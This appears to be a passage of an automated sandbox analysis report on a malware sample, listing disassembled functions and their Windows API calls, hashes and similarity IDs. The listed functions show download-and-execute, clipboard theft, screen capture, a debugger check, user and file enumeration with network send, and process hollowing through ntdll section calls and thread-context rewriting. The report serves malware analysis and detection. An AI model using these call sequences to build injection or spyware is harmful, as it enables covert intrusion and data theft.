                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: DownloadExecuteFileShell
                                                                                          • String ID: open
                                                                                          • API String ID: 2825088817-2758837156
                                                                                          • Opcode ID: 400a122d183a9112cc7a0cd06a1688c26b37542af8c87b61aae9a43f761ae058
                                                                                          • Instruction ID: de45ecf938be0b84f02b1b366aeabb591a3e89dbb22835c7232af05a142efef6
                                                                                          • Opcode Fuzzy Hash: 400a122d183a9112cc7a0cd06a1688c26b37542af8c87b61aae9a43f761ae058
                                                                                          • Instruction Fuzzy Hash: 6F61D331A0430167CA14FB75D8A697E77A99F81708F00093FFD42772D6EE3D8A09869B
                                                                                          Function 0044F2A3 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                                                                                            • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                                                                            • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                                                                                            • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                                                                            • Part of subcall function 00445725: _free.LIBCMT ref: 00445784
                                                                                            • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 00445791
                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044F2F7
                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044F348
                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044F408
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorInfoLastLocale$_free$_abort
                                                                                          • String ID:
                                                                                          • API String ID: 2829624132-0
                                                                                          • Opcode ID: c08902af5a4ebae337e65d4f4913ac80c8ce7fcb5dd297238357898b4052817f
                                                                                          • Instruction ID: 12c224c4da0c85949021a4ccaa6d586ab513ef91610cb16151a2099a543b2454
                                                                                          • Opcode Fuzzy Hash: c08902af5a4ebae337e65d4f4913ac80c8ce7fcb5dd297238357898b4052817f
                                                                                          • Instruction Fuzzy Hash: 49617D71600207ABEB289F25CC82B7B77A8EF14314F1041BBED06C6685EB78D949DB58
                                                                                          Function 004398AC Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • IsDebuggerPresent.KERNEL32 ref: 004399A4
                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004399AE
                                                                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 004399BB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                          • String ID:
                                                                                          • API String ID: 3906539128-0
                                                                                          • Opcode ID: a2edd11b745fd0db19ae8b75a4dca2fd63e5a3b0d4ecfa6da1b026d4ab375051
                                                                                          • Instruction ID: 77e6618fa9d19f9c50586940e2a7469f5a9d54f298177c93e0bbf68cc30459b4
                                                                                          • Opcode Fuzzy Hash: a2edd11b745fd0db19ae8b75a4dca2fd63e5a3b0d4ecfa6da1b026d4ab375051
                                                                                          • Instruction Fuzzy Hash: 1D31D67591122C9BCB21DF65D9897CDB7B8BF08310F5051EAE40CA72A1E7749F858F48
                                                                                          Function 004315EC Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,00431274,00000034,?,?,00000000), ref: 004315FE
                                                                                          • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00431307,00000000,?,00000000), ref: 00431614
                                                                                          • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,00431307,00000000,?,00000000,0041C006), ref: 00431626
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Crypt$Context$AcquireRandomRelease
                                                                                          • String ID:
                                                                                          • API String ID: 1815803762-0
                                                                                          • Opcode ID: 490f37dff30391dd88b2b348f1e17f82ee14bc365aa64bdd7ac48a14519942bc
                                                                                          • Instruction ID: e2f248fbd61bea3c509e9dcbc4a9d000159a3c4e1760f154dd59208f6820a057
                                                                                          • Opcode Fuzzy Hash: 490f37dff30391dd88b2b348f1e17f82ee14bc365aa64bdd7ac48a14519942bc
                                                                                          • Instruction Fuzzy Hash: FDE0923130C310BBEB304F51AC09F172A55EB8DB72FA5063AF112E50F4D6518801855C
                                                                                          Function 0040A65A Relevance: 4.5, APIs: 3, Instructions: 19clipboardCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • OpenClipboard.USER32(00000000), ref: 0040A65D
                                                                                          • GetClipboardData.USER32(0000000D), ref: 0040A669
                                                                                          • CloseClipboard.USER32 ref: 0040A671
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Clipboard$CloseDataOpen
                                                                                          • String ID:
                                                                                          • API String ID: 2058664381-0
                                                                                          • Opcode ID: edb8c36ac275bb67b795d66d8e1b797ea5e31e94c4ba3ac6c333071066a6c16d
                                                                                          • Instruction ID: 184f8b84181a4a50bd43ef3289a1c1a9f5b779335cc527adffbe090e77bee848
                                                                                          • Opcode Fuzzy Hash: edb8c36ac275bb67b795d66d8e1b797ea5e31e94c4ba3ac6c333071066a6c16d
                                                                                          • Instruction Fuzzy Hash: 6CE08C3064432097D2206F60EC08B8A66649B50B12F064A7AB849AB2D1DA75DC208AAE
                                                                                          Function 004329DA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 134COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 004329F3
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FeaturePresentProcessor
                                                                                          • String ID:
                                                                                          • API String ID: 2325560087-3916222277
                                                                                          • Opcode ID: 6bf946e24e0cf3f7143bf6f7c2898541fb51292b7eeb3b4358a3a41aa26ebfb9
                                                                                          • Instruction ID: 4a1c44cf8a386737ece403ae0cfd22a47b20ce31fd9c2d8f3958115f99bf9d9d
                                                                                          • Opcode Fuzzy Hash: 6bf946e24e0cf3f7143bf6f7c2898541fb51292b7eeb3b4358a3a41aa26ebfb9
                                                                                          • Instruction Fuzzy Hash: E4514A719002099BDB24CFAAD98579ABBF4FF48314F14846BD815EB350E3B9A910CFA5
                                                                                          Function 00445E1C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,004419DC,?,00000004), ref: 00445E6F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: InfoLocale
                                                                                          • String ID: GetLocaleInfoEx
                                                                                          • API String ID: 2299586839-2904428671
                                                                                          • Opcode ID: 020099d0525865bb6834e28ad9152f433c6e4676045ed3ecc95ad7b7c68cac6a
                                                                                          • Instruction ID: a9bb3d2992a9d1fe8e60343c55b6d981a628f421e7cf107d295b861f9edee2c3
                                                                                          • Opcode Fuzzy Hash: 020099d0525865bb6834e28ad9152f433c6e4676045ed3ecc95ad7b7c68cac6a
                                                                                          • Instruction Fuzzy Hash: 6DF0F631600708BBDF016F619C05F6E7B51EB14721F10401BFC051A253CA758D109A9D
                                                                                          Function 004068CD Relevance: 3.1, APIs: 2, Instructions: 86fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 004068E8
                                                                                          • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 004069B0
                                                                                            • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FileFind$FirstNextsend
                                                                                          • String ID:
                                                                                          • API String ID: 4113138495-0
                                                                                          • Opcode ID: e3ef31e205124b2d37ce34f80ed01c56440b36d419931c260197812f3169fbb8
                                                                                          • Instruction ID: f886cb8170a1cbefaa312452e39d18d6cd017e90ab843946bfd6f4b2f28fefe7
                                                                                          • Opcode Fuzzy Hash: e3ef31e205124b2d37ce34f80ed01c56440b36d419931c260197812f3169fbb8
                                                                                          • Instruction Fuzzy Hash: 9C218F711043015BC314FBA1DC96CEFB7ACAF91358F400A3EF596621E1EF389A09CA5A
                                                                                          Function 0044F4F3 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                                                                                            • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                                                                            • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                                                                                            • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                                                                            • Part of subcall function 00445725: _free.LIBCMT ref: 00445784
                                                                                            • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 00445791
                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044F547
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                          • String ID:
                                                                                          • API String ID: 1663032902-0
                                                                                          • Opcode ID: ad0e0b7788e936bcfdd9e0a2c8ea1aecabb77b710f5984c66624a7eb150c0fcd
                                                                                          • Instruction ID: 815750de5804ab4a8f75770bcc990d44dba9c2967eca50803adc2dd3443e40da
                                                                                          • Opcode Fuzzy Hash: ad0e0b7788e936bcfdd9e0a2c8ea1aecabb77b710f5984c66624a7eb150c0fcd
                                                                                          • Instruction Fuzzy Hash: 6421B372901206BBEF249F26DC45A7A73A8EB04315F10017BFD01C6242EB78AD59CB59
                                                                                          Function 0044F17B Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                                                                                            • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                                                                            • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                                                                                            • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                                                                          • EnumSystemLocalesW.KERNEL32(0044F2A3,00000001), ref: 0044F1ED
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                          • String ID:
                                                                                          • API String ID: 1084509184-0
                                                                                          • Opcode ID: 673455fbabca7124b3ca300a5bad4779d617d2069552d52611791679d418f519
                                                                                          • Instruction ID: fc4c71b657a69648ba6c32e8c27400de65702582941300ca2eca7bc8fd592fd6
                                                                                          • Opcode Fuzzy Hash: 673455fbabca7124b3ca300a5bad4779d617d2069552d52611791679d418f519
                                                                                          • Instruction Fuzzy Hash: D811293B6007019FEB189F39D89167BBB91FF80358B14443DE94647B40D776A946C744
                                                                                          Function 0044F723 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                                                                                            • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                                                                            • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                                                                                            • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                                                                          • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0044F4C1,00000000,00000000,?), ref: 0044F74F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$InfoLocale_abort_free
                                                                                          • String ID:
                                                                                          • API String ID: 2692324296-0
                                                                                          • Opcode ID: e8e40a4c1e4a1452f322ea5d58aa65e712e874c7af3971ed527245fc130c3ff5
                                                                                          • Instruction ID: e4b95bc4a5e1061338a04706472302caa06a68982d3ebb8569a44a178f9f49d5
                                                                                          • Opcode Fuzzy Hash: e8e40a4c1e4a1452f322ea5d58aa65e712e874c7af3971ed527245fc130c3ff5
                                                                                          • Instruction Fuzzy Hash: 09F02D36600516BBFB245B65DC05BBB7768EF40764F05447AEC19A3240EA7CFD05C6D4
                                                                                          Function 0044F216 Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                                                                                            • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                                                                            • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                                                                                            • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                                                                          • EnumSystemLocalesW.KERNEL32(0044F4F3,00000001), ref: 0044F262
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                          • String ID:
                                                                                          • API String ID: 1084509184-0
                                                                                          • Opcode ID: e9707e75e047b008c80f6bc881a45fe398cc0546891e27ca4c894483a9e1b79d
                                                                                          • Instruction ID: 7c38563944de2097393583401858843e6c2e12a799e64e453201a09b71e8bce8
                                                                                          • Opcode Fuzzy Hash: e9707e75e047b008c80f6bc881a45fe398cc0546891e27ca4c894483a9e1b79d
                                                                                          • Instruction Fuzzy Hash: 44F0223A2007045FEB145F399881A7B7B94FF8036CB15447EF9458B690DAB6AC068614
                                                                                          Function 004195F8 Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetUserNameW.ADVAPI32(?,00000010), ref: 0041962D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: NameUser
                                                                                          • String ID:
                                                                                          • API String ID: 2645101109-0
                                                                                          • Opcode ID: 8951ed9e5e96f4eef37346a31dc1e1cfc055faec67558bb1b1f4eabc83ab8062
                                                                                          • Instruction ID: 5ca8c18713c22ae7facf93a828c8627c995cdb1c7496207664ac88b3b4335c79
                                                                                          • Opcode Fuzzy Hash: 8951ed9e5e96f4eef37346a31dc1e1cfc055faec67558bb1b1f4eabc83ab8062
                                                                                          • Instruction Fuzzy Hash: 7C01FF7290011CABCB04EBD5DC45EDEB7BCEF44319F10016AB505B61A5EEB46A89CB98
                                                                                          Function 00445914 Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00442D9A: EnterCriticalSection.KERNEL32(?,?,004404DB,00000000,0046B4D8,0000000C,00440496,?,?,?,00443038,?,?,004457DA,00000001,00000364), ref: 00442DA9
                                                                                          • EnumSystemLocalesW.KERNEL32(Function_000458CE,00000001,0046B680,0000000C), ref: 0044594C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                          • String ID:
                                                                                          • API String ID: 1272433827-0
                                                                                          • Opcode ID: 9f071f7aa8f2d5cfdb4dd86670e259d2fa7dae68b4529c3cbc217272811744e5
                                                                                          • Instruction ID: 57fcd2d1ba6fdacad71b84952267562ddc6b8062f8818d57533dd41bf3368d71
                                                                                          • Opcode Fuzzy Hash: 9f071f7aa8f2d5cfdb4dd86670e259d2fa7dae68b4529c3cbc217272811744e5
                                                                                          • Instruction Fuzzy Hash: CFF03C72A10700EFEB00EF69D846B5D77F0EB08325F10402AF400DB2A2DAB989448B5E
                                                                                          Function 0044F130 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                                                                                            • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                                                                            • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                                                                                            • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                                                                          • EnumSystemLocalesW.KERNEL32(0044F087,00000001), ref: 0044F167
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                          • String ID:
                                                                                          • API String ID: 1084509184-0
                                                                                          • Opcode ID: 27fc750af04bae75093f47f6c8e3f33632e5f31a47d704513601fd173c54c35f
                                                                                          • Instruction ID: 407cbbfb1d6a14fdc0c4ba4a8479f65f1c0a46e2fba7f2f7bc53bc9e3406d240
                                                                                          • Opcode Fuzzy Hash: 27fc750af04bae75093f47f6c8e3f33632e5f31a47d704513601fd173c54c35f
                                                                                          • Instruction Fuzzy Hash: 22F05C3930020597DB049F35D845A7ABFA0EFC1754F060069EA058B651C6359C46C754
                                                                                          Function 0040E2BB Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00413F34,00471E78,00472910,00471E78,00000000,00471E78,00000000,00471E78,3.8.0 Pro), ref: 0040E2CF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: InfoLocale
                                                                                          • String ID:
                                                                                          • API String ID: 2299586839-0
                                                                                          • Opcode ID: 856777f14b9a4662401ba442cf494b6ebb80c668ca2d98772b8c18b49fbcc60a
                                                                                          • Instruction ID: e43a985d938ffd5d313bbeec62feab64fa47c80c67ee5e1720aa7bcbe65aeca7
                                                                                          • Opcode Fuzzy Hash: 856777f14b9a4662401ba442cf494b6ebb80c668ca2d98772b8c18b49fbcc60a
                                                                                          • Instruction Fuzzy Hash: 65D05E30B4421C7BEA10D6859C0AEAA7B9CD701B62F0001A6BA08D72D0E9E1AE0487E6
                                                                                          Function 004328FC Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_00032908,0043262F), ref: 00432901
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                          • String ID:
                                                                                          • API String ID: 3192549508-0
                                                                                          • Opcode ID: 937b0859e2ecbaa4ed0ef4ac8f36e04938c9481000da7c0a06be09f57d080333
                                                                                          • Instruction ID: aee9a4537fe14d989eba5338f3e0e07ed20d0bd3150f914eab3e23255f36ef43
                                                                                          • Opcode Fuzzy Hash: 937b0859e2ecbaa4ed0ef4ac8f36e04938c9481000da7c0a06be09f57d080333
                                                                                          • Instruction Fuzzy Hash:
                                                                                          Function 00416E7E Relevance: 47.6, APIs: 26, Strings: 1, Instructions: 307windowmemoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00416E98
                                                                                          • CreateCompatibleDC.GDI32(00000000), ref: 00416EA5
                                                                                            • Part of subcall function 004172DF: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 0041730F
                                                                                          • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00416F1B
                                                                                          • DeleteDC.GDI32(00000000), ref: 00416F32
                                                                                          • DeleteDC.GDI32(00000000), ref: 00416F35
                                                                                          • DeleteObject.GDI32(00000000), ref: 00416F38
                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00416F59
                                                                                          • DeleteDC.GDI32(00000000), ref: 00416F6A
                                                                                          • DeleteDC.GDI32(00000000), ref: 00416F6D
                                                                                          • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00416F91
                                                                                          • GetIconInfo.USER32(?,?), ref: 00416FC5
                                                                                          • DeleteObject.GDI32(?), ref: 00416FF4
                                                                                          • DeleteObject.GDI32(?), ref: 00417001
                                                                                          • DrawIcon.USER32(00000000,?,?,?), ref: 0041700E
                                                                                          • GetObjectA.GDI32(00000000,00000018,?), ref: 00417026
                                                                                          • LocalAlloc.KERNEL32(00000040,00000001), ref: 00417095
                                                                                          • GlobalAlloc.KERNEL32(00000000,?), ref: 00417104
                                                                                          • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00417128
                                                                                          • DeleteDC.GDI32(?), ref: 0041713C
                                                                                          • DeleteDC.GDI32(00000000), ref: 0041713F
                                                                                          • DeleteObject.GDI32(00000000), ref: 00417142
                                                                                          • GlobalFree.KERNEL32(?), ref: 0041714D
                                                                                          • DeleteObject.GDI32(00000000), ref: 00417201
                                                                                          • GlobalFree.KERNEL32(?), ref: 00417208
                                                                                          • DeleteDC.GDI32(?), ref: 00417218
                                                                                          • DeleteDC.GDI32(00000000), ref: 00417223
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
                                                                                          • String ID: DISPLAY
                                                                                          • API String ID: 479521175-865373369
                                                                                          • Opcode ID: 1a3d4f3de887f4170ad339b02c00c27acc1d1d199adb59c50c414d62b5943ebe
                                                                                          • Instruction ID: 4ba325f74191387ade15767708145f982ef5b1c7ca4df498548f130554e7309d
                                                                                          • Opcode Fuzzy Hash: 1a3d4f3de887f4170ad339b02c00c27acc1d1d199adb59c50c414d62b5943ebe
                                                                                          • Instruction Fuzzy Hash: 6FB16A315083009FD720DF24DC44BABBBE9EF88755F41482EF98993291DB38E945CB5A
                                                                                          Function 0041642D Relevance: 47.5, APIs: 22, Strings: 5, Instructions: 289libraryloaderthreadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00416474
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00416477
                                                                                          • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00416488
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041648B
                                                                                          • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041649C
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041649F
                                                                                          • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004164B0
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 004164B3
                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00416555
                                                                                          • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041656D
                                                                                          • GetThreadContext.KERNEL32(?,00000000), ref: 00416583
                                                                                          • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004165A9
                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041662B
                                                                                          • TerminateProcess.KERNEL32(?,00000000), ref: 0041663F
                                                                                          • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041667F
                                                                                          • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00416749
                                                                                          • SetThreadContext.KERNEL32(?,00000000), ref: 00416766
                                                                                          • ResumeThread.KERNEL32(?), ref: 00416773
                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041678A
                                                                                          • GetCurrentProcess.KERNEL32(?), ref: 00416795
                                                                                          • TerminateProcess.KERNEL32(?,00000000), ref: 004167B0
                                                                                          • GetLastError.KERNEL32 ref: 004167B8
                                                                                          Strings
                                                                                          Memory Dump Source
